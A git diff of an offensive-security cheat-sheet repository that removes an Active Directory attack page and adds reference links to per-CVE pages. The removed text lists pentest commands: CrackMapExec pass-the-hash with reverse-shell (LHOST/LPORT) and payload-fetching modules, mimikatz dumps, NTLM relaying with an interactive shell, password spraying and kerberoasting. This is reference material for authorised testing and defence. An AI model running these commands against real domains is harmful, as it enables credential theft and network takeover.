diff --git a/docs/active-directory/Active Directory Attack.md b/docs/active-directory/Active Directory Attack.md deleted file mode 100644 index 595aad6..0000000 --- a/docs/active-directory/Active Directory Attack.md +++ /dev/null @@ -1,228 +0,0 @@ -# Active Directory Attacks - -## Tools - -* [Impacket](https://github.com/CoreSecurity/impacket) or the [Windows version](https://github.com/maaaaz/impacket-examples-windows) -* [Responder](https://github.com/lgandx/Responder) -* [InveighZero](https://github.com/Kevin-Robertson/InveighZero) -* [Mimikatz](https://github.com/gentilkiwi/mimikatz) -* [Ranger](https://github.com/funkandwagnalls/ranger) -* [AdExplorer](https://docs.microsoft.com/en-us/sysinternals/downloads/adexplorer) -* [CrackMapExec](https://github.com/mpgn/CrackMapExec) - - ```powershell - # use the latest release, CME is now a binary packaged will all its dependencies - root@payload$ wget https://github.com/mpgn/CrackMapExec/releases/download/v5.0.1dev/cme-ubuntu-latest.zip - - # execute cme (smb, winrm, mssql, ...) - root@payload$ cme smb -L - root@payload$ cme smb -M name_module -o VAR=DATA - root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --local-auth - root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f --shares - root@payload$ cme smb 192.168.1.100 -u Administrator -H ':5858d47a41e40b40f294b3100bea611f' -d 'DOMAIN' -M invoke_sessiongopher - root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable - root@payload$ cme smb 192.168.1.100 -u Administrator -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443 - root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload" - root@payload$ cme smb 192.168.1.100 -u Administrator -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -X 'whoami' - root@payload$ cme smb 10.10.14.0/24 -u user -p 'Password' --local-auth -M mimikatz - root@payload$ cme mimikatz --server http --server-port 80 - ``` - -* [Mitm6](https://github.com/fox-it/mitm6.git) - - ```bash - git clone https://github.com/fox-it/mitm6.git && cd mitm6 - pip install . - mitm6 -d lab.local - ntlmrelayx.py -wh 192.168.218.129 -t smb://192.168.218.128/ -i - # -wh: Server hosting WPAD file (Attacker’s IP) - # -t: Target (You cannot relay credentials to the same device that you’re spoofing) - # -i: open an interactive shell - ntlmrelayx.py -t ldaps://lab.local -wh attacker-wpad --delegate-access - ``` - -* [ADRecon](https://github.com/sense-of-security/ADRecon) - - ```powershell - .\ADRecon.ps1 -DomainController MYAD.net -Credential MYAD\myuser - ``` - -* [Active Directory Assessment and Privilege Escalation Script](https://github.com/hausec/ADAPE-Script) - - ```powershell - powershell.exe -ExecutionPolicy Bypass ./ADAPE.ps1 - ``` - -* [Ping Castle](https://github.com/vletoux/pingcastle) - - ```powershell - pingcastle.exe --healthcheck --server --user --password --advanced-live --nullsession - pingcastle.exe --healthcheck --server domain.local - pingcastle.exe --graph --server domain.local - pingcastle.exe --scanner scanner_name --server domain.local - available scanners are:aclcheck,antivirus,computerversion,foreignusers,laps_bitlocker,localadmin,nullsession,nullsession-trust,oxidbindings,remote,share,smb,smb3querynetwork,spooler,startup,zerologon,computers,users - ``` - -* [Kerbrute](https://github.com/ropnop/kerbrute) - - ```powershell - ./kerbrute passwordspray -d - ``` - -* [Rubeus](https://github.com/GhostPack/Rubeus) - - ```powershell - Rubeus.exe asktgt /user:USER [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ptt] [/luid] - Rubeus.exe dump [/service:SERVICE] [/luid:LOGINID] - Rubeus.exe klist [/luid:LOGINID] - Rubeus.exe kerberoast [/spn:"blah/blah"] [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU=,..."] - ``` - -* [AutomatedLab](https://github.com/AutomatedLab/AutomatedLab) - ```powershell - New-LabDefinition -Name GettingStarted -DefaultVirtualizationEngine HyperV - Add-LabMachineDefinition -Name FirstServer -OperatingSystem 'Windows Server 2016 SERVERSTANDARD' - Install-Lab - Show-LabDeploymentSummary - ``` - - -## References - -* [Explain like I’m 5: Kerberos - Apr 2, 2013 - @roguelynn](https://www.roguelynn.com/words/explain-like-im-5-kerberos/) -* [Impersonating Office 365 Users With Mimikatz - January 15, 2017 - Michael Grafnetter](https://www.dsinternals.com/en/impersonating-office-365-users-mimikatz/) -* [Abusing Exchange: One API call away from Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin) -* [Abusing Kerberos: Kerberoasting - Haboob Team](https://www.exploit-db.com/docs/english/45051-abusing-kerberos---kerberoasting.pdf) -* [Abusing S4U2Self: Another Sneaky Active Directory Persistence - Alsid](https://alsid.com/company/news/abusing-s4u2self-another-sneaky-active-directory-persistence) -* [Attacks Against Windows PXE Boot Images - February 13th, 2018 - Thomas Elling](https://blog.netspi.com/attacks-against-windows-pxe-boot-images/) -* [BUILDING AND ATTACKING AN ACTIVE DIRECTORY LAB WITH POWERSHELL - @myexploit2600 & @5ub34x](https://1337red.wordpress.com/building-and-attacking-an-active-directory-lab-with-powershell/) -* [Becoming Darth Sidious: Creating a Windows Domain (Active Directory) and hacking it - @chryzsh](https://chryzsh.gitbooks.io/darthsidious/content/building-a-lab/building-a-lab/building-a-small-lab.html) -* [BlueHat IL - Benjamin Delpy](https://microsoftrnd.co.il/Press%20Kit/BlueHat%20IL%20Decks/BenjaminDelpy.pdf) -* [COMPROMISSION DES POSTES DE TRAVAIL GRÂCE À LAPS ET PXE MISC n° 103 - mai 2019 - Rémi Escourrou, Cyprien Oger ](https://connect.ed-diamond.com/MISC/MISC-103/Compromission-des-postes-de-travail-grace-a-LAPS-et-PXE) -* [Chump2Trump - AD Privesc talk at WAHCKon 2017 - @l0ss](https://github.com/l0ss/Chump2Trump/blob/master/ChumpToTrump.pdf) -* [DiskShadow The return of VSS Evasion Persistence and AD DB extraction](https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/) -* [Domain Penetration Testing: Using BloodHound, Crackmapexec, & Mimikatz to get Domain Admin](https://hausec.com/2017/10/21/domain-penetration-testing-using-bloodhound-crackmapexec-mimikatz-to-get-domain-admin/) -* [Dumping Domain Password Hashes - Pentestlab](https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/) -* [Exploiting MS14-068 with PyKEK and Kali - 14 DEC 2014 - ZACH GRACE @ztgrace](https://zachgrace.com/posts/exploiting-ms14-068/) -* [Exploiting PrivExchange - April 11, 2019 - @chryzsh](https://chryzsh.github.io/exploiting-privexchange/) -* [Exploiting Unconstrained Delegation - Riccardo Ancarani - 28 APRIL 2019](https://www.riccardoancarani.it/exploiting-unconstrained-delegation/) -* [Finding Passwords in SYSVOL & Exploiting Group Policy Preferences](https://adsecurity.org/?p=2288) -* [How Attackers Use Kerberos Silver Tickets to Exploit Systems - Sean Metcalf](https://adsecurity.org/?p=2011) -* [Fun with LDAP, Kerberos (and MSRPC) in AD Environments](https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments) -* [Getting the goods with CrackMapExec: Part 1, by byt3bl33d3r](https://byt3bl33d3r.github.io/getting-the-goods-with-crackmapexec-part-1.html) -* [Getting the goods with CrackMapExec: Part 2, by byt3bl33d3r](https://byt3bl33d3r.github.io/getting-the-goods-with-crackmapexec-part-2.html) -* [Golden ticket - Pentestlab](https://pentestlab.blog/2018/04/09/golden-ticket/) -* [How To Pass the Ticket Through SSH Tunnels - bluescreenofjeff](https://bluescreenofjeff.com/2017-05-23-how-to-pass-the-ticket-through-ssh-tunnels/) -* [Hunting in Active Directory: Unconstrained Delegation & Forests Trusts - Roberto Rodriguez - Nov 28, 2018](https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1) -* [Invoke-Kerberoast - Powersploit Read the docs](https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/) -* [Kerberoasting - Part 1 - Mubix “Rob” Fuller](https://room362.com/post/2016/kerberoast-pt1/) -* [Passing the hash with native RDP client (mstsc.exe)](https://michael-eder.net/post/2018/native_rdp_pass_the_hash/) -* [Pen Testing Active Directory Environments - Part I: Introduction to crackmapexec (and PowerView)](https://blog.varonis.com/pen-testing-active-directory-environments-part-introduction-crackmapexec-powerview/) -* [Pen Testing Active Directory Environments - Part II: Getting Stuff Done With PowerView](https://blog.varonis.com/pen-testing-active-directory-environments-part-ii-getting-stuff-done-with-powerview/) -* [Pen Testing Active Directory Environments - Part III: Chasing Power Users](https://blog.varonis.com/pen-testing-active-directory-environments-part-iii-chasing-power-users/) -* [Pen Testing Active Directory Environments - Part IV: Graph Fun](https://blog.varonis.com/pen-testing-active-directory-environments-part-iv-graph-fun/) -* [Pen Testing Active Directory Environments - Part V: Admins and Graphs](https://blog.varonis.com/pen-testing-active-directory-v-admins-graphs/) -* [Pen Testing Active Directory Environments - Part VI: The Final Case](https://blog.varonis.com/pen-testing-active-directory-part-vi-final-case/) -* [Penetration Testing Active Directory, Part I - March 5, 2019 - Hausec](https://hausec.com/2019/03/05/penetration-testing-active-directory-part-i/) -* [Penetration Testing Active Directory, Part II - March 12, 2019 - Hausec](https://hausec.com/2019/03/12/penetration-testing-active-directory-part-ii/) -* [Post-OSCP Series Part 2 - Kerberoasting - 16 APRIL 2019 - Jon Hickman](https://0metasecurity.com/post-oscp-part-2/) -* [Quick Guide to Installing Bloodhound in Kali-Rolling - James Smith](https://stealingthe.network/quick-guide-to-installing-bloodhound-in-kali-rolling/) -* [Red Teaming Made Easy with Exchange Privilege Escalation and PowerPriv - Thursday, January 31, 2019 - Dave](http://blog.redxorblue.com/2019/01/red-teaming-made-easy-with-exchange.html) -* [Roasting AS-REPs - January 17, 2017 - harmj0y](https://www.harmj0y.net/blog/activedirectory/roasting-as-reps/) -* [Top Five Ways I Got Domain Admin on Your Internal Network before Lunch (2018 Edition) - Adam Toscher](https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa) -* [Using bloodhound to map the user network - Hausec](https://hausec.com/2017/10/26/using-bloodhound-to-map-the-user-network/) -* [WHAT’S SPECIAL ABOUT THE BUILTIN ADMINISTRATOR ACCOUNT? - 21/05/2012 - MORGAN SIMONSEN](https://morgansimonsen.com/2012/05/21/whats-special-about-the-builtin-administrator-account-12/) -* [WONKACHALL AKERVA NDH2018 – WRITE UP PART 1](https://akerva.com/blog/wonkachall-akerva-ndh-2018-write-up-part-1/) -* [WONKACHALL AKERVA NDH2018 – WRITE UP PART 2](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-2/) -* [WONKACHALL AKERVA NDH2018 – WRITE UP PART 3](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-3/) -* [WONKACHALL AKERVA NDH2018 – WRITE UP PART 4](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-4/) -* [WONKACHALL AKERVA NDH2018 – WRITE UP PART 5](https://akerva.com/blog/wonkachall-akerva-ndh2018-write-up-part-5/) -* [Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory - 28 January 2019 - Elad Shami](https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html) -* [A Case Study in Wagging the Dog: Computer Takeover - Will Schroeder - Feb 28, 2019](https://posts.specterops.io/a-case-study-in-wagging-the-dog-computer-takeover-2bcb7f94c783) -* [[PrivExchange] From user to domain admin in less than 60sec ! - davy](http://blog.randorisec.fr/privexchange-from-user-to-domain-admin-in-less-than-60sec/) -* [Pass-the-Hash Is Dead: Long Live LocalAccountTokenFilterPolicy - March 16, 2017 - harmj0y](http://www.harmj0y.net/blog/redteaming/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/) -* [Kerberos (II): How to attack Kerberos? - June 4, 2019 - ELOY PÉREZ](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/) -* [Attacking Read-Only Domain Controllers (RODCs) to Own Active Directory - Sean Metcalf](https://adsecurity.org/?p=3592) -* [All you need to know about Keytab files - Pierre Audonnet [MSFT] - January 3, 2018](https://blogs.technet.microsoft.com/pie/2018/01/03/all-you-need-to-know-about-keytab-files/) -* [Taming the Beast Assess Kerberos-Protected Networks - Emmanuel Bouillon](https://www.blackhat.com/presentations/bh-europe-09/Bouillon/BlackHat-Europe-09-Bouillon-Taming-the-Beast-Kerberous-slides.pdf) -* [Playing with Relayed Credentials - June 27, 2018](https://www.secureauth.com/blog/playing-relayed-credentials) -* [Exploiting CVE-2019-1040 - Combining relay vulnerabilities for RCE and Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/) -* [Drop the MIC - CVE-2019-1040 - Marina Simakov - Jun 11, 2019](https://blog.preempt.com/drop-the-mic) -* [How to build a SQL Server Virtual Lab with AutomatedLab in Hyper-V - October 30, 2017 - Craig Porteous](https://www.sqlshack.com/build-sql-server-virtual-lab-automatedlab-hyper-v/) -* [SMB Share – SCF File Attacks - December 13, 2017 - @netbiosX](https://pentestlab.blog/2017/12/13/smb-share-scf-file-attacks/) -* [Escalating privileges with ACLs in Active Directory - April 26, 2018 - Rindert Kramer and Dirk-jan Mollema](https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/) -* [A Red Teamer’s Guide to GPOs and OUs - APRIL 2, 2018 - @_wald0](https://wald0.com/?p=179) -* [Carlos Garcia - Rooted2019 - Pentesting Active Directory Forests public.pdf](https://www.dropbox.com/s/ilzjtlo0vbyu1u0/Carlos%20Garcia%20-%20Rooted2019%20-%20Pentesting%20Active%20Directory%20Forests%20public.pdf?dl=0) -* [Kerberosity Killed the Domain: An Offensive Kerberos Overview - Ryan Hausknecht - Mar 10](https://posts.specterops.io/kerberosity-killed-the-domain-an-offensive-kerberos-overview-eb04b1402c61) -* [Active-Directory-Exploitation-Cheat-Sheet - @buftas](https://github.com/buftas/Active-Directory-Exploitation-Cheat-Sheet#local-privilege-escalation) -* [GPO Abuse - Part 1 - RastaMouse - 6 January 2019](https://rastamouse.me/2019/01/gpo-abuse-part-1/) -* [GPO Abuse - Part 2 - RastaMouse - 13 January 2019](https://rastamouse.me/2019/01/gpo-abuse-part-2/) -* [Abusing GPO Permissions - harmj0y - March 17, 2016](https://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/) -* [How To Attack Kerberos 101 - m0chan - July 31, 2019](https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html) -* [ACE to RCE - @JustinPerdok - July 24, 2020](https://sensepost.com/blog/2020/ace-to-rce/) -* [Zerologon:Unauthenticated domain controller compromise by subverting Netlogon cryptography (CVE-2020-1472) - Tom Tervoort, September 2020](https://www.secura.com/pathtoimg.php?id=2055) -* [Access Control Entries (ACEs) - The Hacker Recipes - @_nwodtuhs](https://www.thehacker.recipes/active-directory-domain-services/movement/abusing-aces) -* [CVE-2020-17049: Kerberos Bronze Bit Attack – Practical Exploitation - Jake Karnes - December 8th, 2020](https://blog.netspi.com/cve-2020-17049-kerberos-bronze-bit-attack/) -* [CVE-2020-17049: Kerberos Bronze Bit Attack – Theory - Jake Karnes - December 8th, 2020](https://blog.netspi.com/cve-2020-17049-kerberos-bronze-bit-theory/) -* [Kerberos Bronze Bit Attack (CVE-2020-17049) Scenarios to Potentially Compromise Active Directory](https://www.hub.trimarcsecurity.com/post/leveraging-the-kerberos-bronze-bit-attack-cve-2020-17049-scenarios-to-compromise-active-directory) -* [GPO Abuse: "You can't see me" - Huy Kha - July 19, 2019](https://pentestmag.com/gpo-abuse-you-cant-see-me/) -* [Lateral movement via dcom: round 2 - enigma0x3 - January 23, 2017](https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/) -* [New lateral movement techniques abuse DCOM technology - Philip Tsukerman - Jan 25, 2018](https://www.cybereason.com/blog/dcom-lateral-movement-techniques) -* [Kerberos Tickets on Linux Red Teams - April 01, 2020 | by Trevor Haskell](https://www.fireeye.com/blog/threat-research/2020/04/kerberos-tickets-on-linux-red-teams.html) -* [AD CS relay attack - practical guide - 23 Jun 2021 - @exandroiddev](https://www.exandroid.dev/2021/06/23/ad-cs-relay-attack-practical-guide/) -* [Shadow Credentials: Abusing Key Trust Account Mapping for Account Takeover - Elad Shamir - Jun 17](https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab) -* [Playing with PrintNightmare - 0xdf - Jul 8, 2021](https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html) -* [Attacking Active Directory: 0 to 0.9 - Eloy Pérez González - 2021/05/29](https://zer1t0.gitlab.io/posts/attacking_ad/) -* [Microsoft ADCS – Abusing PKI in Active Directory Environment - Jean MARSAULT - 14/06/2021](https://www.riskinsight-wavestone.com/en/2021/06/microsoft-adcs-abusing-pki-in-active-directory-environment/) -* [Certified Pre-Owned - Will Schroeder and Lee Christensen - June 17, 2021](http://www.harmj0y.net/blog/activedirectory/certified-pre-owned/) -* [NTLM relaying to AD CS - On certificates, printers and a little hippo - Dirk-jan Mollema](https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/) -* [Certified Pre-Owned Abusing Active Directory Certificate Services - @harmj0y @tifkin_](https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Certified-Pre-Owned-Abusing-Active-Directory-Certificate-Services.pdf) -* [Certified Pre-Owned - Will Schroeder - Jun 17 2021](https://posts.specterops.io/certified-pre-owned-d95910965cd2) -* [AD CS/PKI template exploit via PetitPotam and NTLMRelayx, from 0 to DomainAdmin in 4 steps by frank | Jul 23, 2021](https://www.bussink.net/ad-cs-exploit-via-petitpotam-from-0-to-domain-domain/) -* [NTLMv1_Downgrade.md - S3cur3Th1sSh1t - 09/07/2021](https://gist.github.com/S3cur3Th1sSh1t/0c017018c2000b1d5eddf2d6a194b7bb) -* [UnPAC the hash - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/unpac-the-hash) -* [Lateral Movement – WebClient](https://pentestlab.blog/2021/10/20/lateral-movement-webclient/) -* [Shadow Credentials: Workstation Takeover Edition - Matthew Creel](https://www.fortalicesolutions.com/posts/shadow-credentials-workstation-takeover-edition) -* [Certificate templates - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/certificate-templates) -* [CA configuration - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/ca-configuration) -* [Access controls - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/access-controls) -* [Web endpoints - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/ad-cs/web-endpoints) -* [sAMAccountName spoofing - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing) -* [CVE-2021-42287/CVE-2021-42278 Weaponisation - @exploitph](https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html) -* [ADCS: Playing with ESC4 - Matthew Creel](https://www.fortalicesolutions.com/posts/adcs-playing-with-esc4) -* [The Kerberos Key List Attack: The return of the Read Only Domain Controllers - Leandro Cuozzo](https://www.secureauth.com/blog/the-kerberos-key-list-attack-the-return-of-the-read-only-domain-controllers/) -* [AD CS: weaponizing the ESC7 attack - Kurosh Dabbagh - 26 January, 2022](https://www.blackarrow.net/adcs-weaponizing-esc7-attack/) -* [AD CS: from ManageCA to RCE - 11 February, 2022 - Pablo Martínez, Kurosh Dabbagh](https://www.blackarrow.net/ad-cs-from-manageca-to-rce/) -* [Introducing the Golden GMSA Attack - YUVAL GORDON - March 01, 2022](https://www.semperis.com/blog/golden-gmsa-attack/) -* [Introducing MalSCCM - Phil Keeble -May 4, 2022](https://labs.nettitude.com/blog/introducing-malsccm/) -* [Certifried: Active Directory Domain Privilege Escalation (CVE-2022–26923) - Oliver Lyak](https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4) -* [bloodyAD and CVE-2022-26923 - soka - 11 May 2022](https://cravaterouge.github.io/ad/privesc/2022/05/11/bloodyad-and-CVE-2022-26923.html) -* [DIVING INTO PRE-CREATED COMPUTER ACCOUNTS - May 10, 2022 - By Oddvar Moe](https://www.trustedsec.com/blog/diving-into-pre-created-computer-accounts/) -* [How NOT to use the PAM trust - Leveraging Shadow Principals for Cross Forest Attacks - Thursday, April 18, 2019 - Nikhil SamratAshok Mittal](http://www.labofapenetrationtester.com/2019/04/abusing-PAM.html) -* [Shadow Credentials - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials) -* [Network Access Accounts are evil… - ROGER ZANDER - 13 SEP 2015](https://rzander.azurewebsites.net/network-access-accounts-are-evil/) -* [The Phantom Credentials of SCCM: Why the NAA Won’t Die - Duane Michael - Jun 28](https://posts.specterops.io/the-phantom-credentials-of-sccm-why-the-naa-wont-die-332ac7aa1ab9) -* [Diamond tickets - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/diamond) -* [A Diamond (Ticket) in the Ruff - By CHARLIE CLARK July 05, 2022](https://www.semperis.com/blog/a-diamond-ticket-in-the-ruff/) -* [Sapphire tickets - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/sapphire) -* [Exploiting RBCD Using a Normal User Account - tiraniddo.dev - Friday, 13 May 2022](https://www.tiraniddo.dev/2022/05/exploiting-rbcd-using-normal-user.html) -* [Exploring SCCM by Unobfuscating Network Access Accounts - @_xpn_ - Posted on 2022-07-09](https://blog.xpnsec.com/unobfuscating-network-access-accounts/) -* [.NET Advanced Code Auditing XmlSerializer Deserialization Vulnerability - April 2, 2019 by znlive](https://znlive.com/xmlserializer-deserialization-vulnerability) -* [Practical guide for Golden SAML - Practical guide step by step to create golden SAML](https://nodauf.dev/p/practical-guide-for-golden-saml/) -* [Relaying to AD Certificate Services over RPC - NOVEMBER 16, 2022 - SYLVAIN HEINIGER](https://blog.compass-security.com/2022/11/relaying-to-ad-certificate-services-over-rpc/) -* [I AM AD FS AND SO CAN YOU - Douglas Bienstock & Austin Baker - Mandiant](https://troopers.de/downloads/troopers19/TROOPERS19_AD_AD_FS.pdf) -* [Hunt for the gMSA secrets - Dr Nestori Syynimaa (@DrAzureAD) - August 29, 2022](https://aadinternals.com/post/gmsa/) -* [Relaying NTLM Authentication from SCCM Clients - Chris Thompson - Jun 30, 2022](https://posts.specterops.io/relaying-ntlm-authentication-from-sccm-clients-7dccb8f92867) -* [Poc’ing Beyond Domain Admin - Part 1 - cube0x0](https://cube0x0.github.io/Pocing-Beyond-DA/) -* [At the Edge of Tier Zero: The Curious Case of the RODC - Elad Shamir](https://posts.specterops.io/at-the-edge-of-tier-zero-the-curious-case-of-the-rodc-ef5f1799ca06) -* [Attacking Read-Only Domain Controllers (RODCs) to Own Active Directory - Sean Metcalf](https://adsecurity.org/?p=3592) -* [The Kerberos Key List Attack: The return of the Read Only Domain Controllers - Leandro Cuozzo](https://www.secureauth.com/blog/the-kerberos-key-list-attack-the-return-of-the-read-only-domain-controllers/) -* [Timeroasting: Attacking Trust Accounts in Active Directory - Tom Tervoort - 01 March 2023](https://www.secura.com/blog/timeroasting-attacking-trust-accounts-in-active-directory) -* [TIMEROASTING, TRUSTROASTING AND COMPUTER SPRAYING WHITE PAPER - Tom Tervoort](https://www.secura.com/uploads/whitepapers/Secura-WP-Timeroasting-v3.pdf) -* [Beyond LLMNR/NBNS Spoofing – Exploiting Active Directory-Integrated DNS - July 10, 2018 | Kevin Robertson](https://www.netspi.com/blog/technical/network-penetration-testing/exploiting-adidns/) -* [ADIDNS Revisited – WPAD, GQBL, and More - December 5, 2018 | Kevin Robertson](https://www.netspi.com/blog/technical/network-penetration-testing/adidns-revisited/) -* [Getting in the Zone: dumping Active Directory DNS using adidnsdump - Dirk-jan Mollema](https://blog.fox-it.com/2019/04/25/getting-in-the-zone-dumping-active-directory-dns-using-adidnsdump/) -* [S4U2self abuse - TheHackerRecipes](https://www.thehacker.recipes/ad/movement/kerberos/delegations/s4u2self-abuse) -* [Abusing Kerberos S4U2self for local privilege escalation - cfalta](https://cyberstoph.org/posts/2021/06/abusing-kerberos-s4u2self-for-local-privilege-escalation/) -* [External Trusts Are Evil - 14 March 2023 - Charlie Clark (@exploitph)](https://exploit.ph/external-trusts-are-evil.html) -* [Certificates and Pwnage and Patches, Oh My! - Will Schroeder - Nov 9, 2022](https://posts.specterops.io/certificates-and-pwnage-and-patches-oh-my-8ae0f4304c1d) diff --git a/docs/active-directory/CVE/MS14-068.md b/docs/active-directory/CVE/MS14-068.md index edf59a9..d2f90ac 100644 --- a/docs/active-directory/CVE/MS14-068.md +++ b/docs/active-directory/CVE/MS14-068.md @@ -72,3 +72,8 @@ mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache" ## Mitigations * Ensure the DCPromo process includes a patch QA step before running DCPromo that checks for installation of KB3011780. The quick and easy way to perform this check is with PowerShell: get-hotfix 3011780 + + +## References + +* [Exploiting MS14-068 with PyKEK and Kali - 14 DEC 2014 - ZACH GRACE @ztgrace](https://zachgrace.com/posts/exploiting-ms14-068/) \ No newline at end of file diff --git a/docs/active-directory/CVE/NoPAC.md b/docs/active-directory/CVE/NoPAC.md index 6809f61..dd71d26 100644 --- a/docs/active-directory/CVE/NoPAC.md +++ b/docs/active-directory/CVE/NoPAC.md @@ -119,3 +119,7 @@ Automated exploitation: * [KB5008102](https://support.microsoft.com/en-us/topic/kb5008102-active-directory-security-accounts-manager-hardening-changes-cve-2021-42278-5975b463-4c95-45e1-831a-d120004e258e) * [KB5008380](https://support.microsoft.com/en-us/topic/kb5008380-authentication-updates-cve-2021-42287-9dafac11-e0d0-4cb8-959a-143bd0201041) + +## References + +* [sAMAccountName spoofing - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing) \ No newline at end of file diff --git a/docs/active-directory/CVE/PrintNightmare.md b/docs/active-directory/CVE/PrintNightmare.md index 6b2cd6a..979a750 100644 --- a/docs/active-directory/CVE/PrintNightmare.md +++ b/docs/active-directory/CVE/PrintNightmare.md @@ -86,4 +86,9 @@ cme smb -u user -p password -d domain.local -M webdav [TARGET] |--------|-----------------------|------------------------------------------| | 0x5 | `rpc_s_access_denied` | Permissions on the file in the SMB share | | 0x525 | `ERROR_NO_SUCH_USER` | The specified account does not exist. | -| 0x180 | unknown error code | Share is not SMB2 | \ No newline at end of file +| 0x180 | unknown error code | Share is not SMB2 | + + +## References + +* [Playing with PrintNightmare - 0xdf - Jul 8, 2021](https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html) \ No newline at end of file diff --git a/docs/active-directory/CVE/PrivExchange.md b/docs/active-directory/CVE/PrivExchange.md index 004994c..35e6cd0 100644 --- a/docs/active-directory/CVE/PrivExchange.md +++ b/docs/active-directory/CVE/PrivExchange.md @@ -1,4 +1,4 @@ -# PrivExchange attack +# PrivExchange Exchange your privileges for Domain Admin privs by abusing Exchange. :warning: You need a shell on a user account with a mailbox. @@ -52,4 +52,12 @@ Alternatively you can use an all-in-one tool : Exchange2domain. git clone github.com/Ridter/Exchange2domain python Exchange2domain.py -ah attackterip -ap listenport -u user -p password -d domain.com -th DCip MailServerip python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th DCip --just-dc-user krbtgt MailServerip -``` \ No newline at end of file +``` + + +## References + +* [Abusing Exchange: One API call away from Domain Admin - Dirk-jan Mollema](https://dirkjanm.io/abusing-exchange-one-api-call-away-from-domain-admin) +* [Exploiting PrivExchange - April 11, 2019 - @chryzsh](https://chryzsh.github.io/exploiting-privexchange/) +* [[PrivExchange] From user to domain admin in less than 60sec ! - davy](http://blog.randorisec.fr/privexchange-from-user-to-domain-admin-in-less-than-60sec/) +* [Red Teaming Made Easy with Exchange Privilege Escalation and PowerPriv - Thursday, January 31, 2019 - Dave](http://blog.redxorblue.com/2019/01/red-teaming-made-easy-with-exchange.html) diff --git a/docs/active-directory/CVE/ZeroLogon.md b/docs/active-directory/CVE/ZeroLogon.md index 02f70dd..0975bcf 100644 --- a/docs/active-directory/CVE/ZeroLogon.md +++ b/docs/active-directory/CVE/ZeroLogon.md @@ -98,4 +98,9 @@ The following prerequisites are needed: #Trigger printerbug in 2nd shell python3 printerbug.py 'LAB.LOCAL'/joe:Password123@10.10.10.10 10.10.10.12 - ``` \ No newline at end of file + ``` + + +## References + +* [Zerologon:Unauthenticated domain controller compromise by subverting Netlogon cryptography (CVE-2020-1472) - Tom Tervoort, September 2020](https://www.secura.com/pathtoimg.php?id=2055) \ No newline at end of file diff --git a/docs/active-directory/ad-adcs-certificate-services.md b/docs/active-directory/ad-adcs-certificate-services.md index b0aae4a..d8c65b3 100644 --- a/docs/active-directory/ad-adcs-certificate-services.md +++ b/docs/active-directory/ad-adcs-certificate-services.md @@ -397,3 +397,26 @@ Using the **UnPAC The Hash** method, you can retrieve the NT Hash for an User vi # Use the session key to recover the NT hash $ export KRB5CCNAME="TGT_CCACHE_FILE" getnthash.py -key 'AS-REP encryption key' 'FQDN_DOMAIN'/'TARGET_SAMNAME' ``` + + +## References + +* [Certified Pre-Owned - Will Schroeder and Lee Christensen - June 17, 2021](http://www.harmj0y.net/blog/activedirectory/certified-pre-owned/) +* [Certified Pre-Owned Abusing Active Directory Certificate Services - @harmj0y @tifkin_](https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Certified-Pre-Owned-Abusing-Active-Directory-Certificate-Services.pdf) +* [Certified Pre-Owned - Will Schroeder - Jun 17 2021](https://posts.specterops.io/certified-pre-owned-d95910965cd2) +* [Microsoft ADCS – 